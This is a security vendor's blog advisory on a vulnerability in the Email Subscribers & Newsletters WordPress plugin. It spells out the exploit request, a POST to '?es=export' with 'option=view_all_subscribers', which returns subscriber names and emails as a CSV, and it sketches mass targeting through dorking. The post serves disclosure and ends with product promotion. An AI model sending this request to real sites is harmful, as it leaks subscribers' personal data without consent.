Email Subscribers & Newsletters WordPress plugin developed by Icegram has more than one hundred thousands active installs. Email Subscribers & Newsletters plugin is a complete newsletter solution, and you can collect leads, send automated notification emails, create and send newsletters.
Email Subscribers & Newsletters WordPress is an excellent plugin with a lot of features. However today I don’t want to discuss all the features of this plugin, I want to talk about the vulnerability that was found by ThreatPress Security company in this piece of software.
Email Subscribers & Newsletters plugin vulnerability
Recently we (ThreatPress Security) found a vulnerability in Email Subscribers & Newsletters plugin that could be easily exploited by anyone. I mean, by anyone. And the result of the successful attack is a complete list of subscribers.
The CSV file that you’ll be able to download if you succeed contains names and email addresses. Well, it’s not the first time when we see the vulnerability that causes data leakage, but in this case, it is a dangerous problem due to the popularity of the plugin.
Let’s make some math. WordPress statistic data says that there are more than one hundred thousands active installs. We can confirm that we were able to search out 81212 websites that do have this plugin installed and active.
Later we did some research to find out the average number of subscribers per site (please don’t ask us how we did it). There were several sites with more than forty thousand subscribers, and most of the websites had about two hundred subscribers.
Now let’s say two hundred subscribers is the average, now we need to multiply this number by the number of sites that we were able to detect, and we have a vast amount of about 16 million subscribers — quite a sweet bite for any hacker.
Since the vulnerability is easily exploitable and there are lots of public data sources (Google Dorking and more) that an attacker can use to find the vulnerable websites, it might become a massive data leak.
Exploitation of the vulnerability
OK, that is the worst part. Simple HTTP POST request sent to vulnerable website “domain.com/?es=export” with some extra parameters like
option=view_all_subscribers allows you to download a CSV file with all database of subscribers. File that is responsible for export is “export-email-address.php”. An attacker can use some more additional parameters like
As you can see the exploitation is too easy and an attacker with some minimal hacking skills can access the data without much effort. Moreover, a more skilled attacker can automate the process. He can identify all the websites with the vulnerable plugin on the Internet and launch the bot which will download data from all vulnerable sites.
Such vulnerability can make a significant impact on the security of a hundred thousand WordPress websites and even on millions of their users. Again, I want to remind you that site security requires constant attention and several layers of protection.
Receiving timely information can save your site from significant problems, which is why I recommend using ThreatPress Security plugin for WordPress. You’ll get alerts instantly if plugin detects any vulnerable software on your WordPress site. Since ThreatPress security plugin uses an API to check the status of your plugins, themes, and WordPress itself on a ThreatPress vulnerabilities database, it provides quickest possible reaction to newly discovered threats. And don’t forget to keep your software up to date.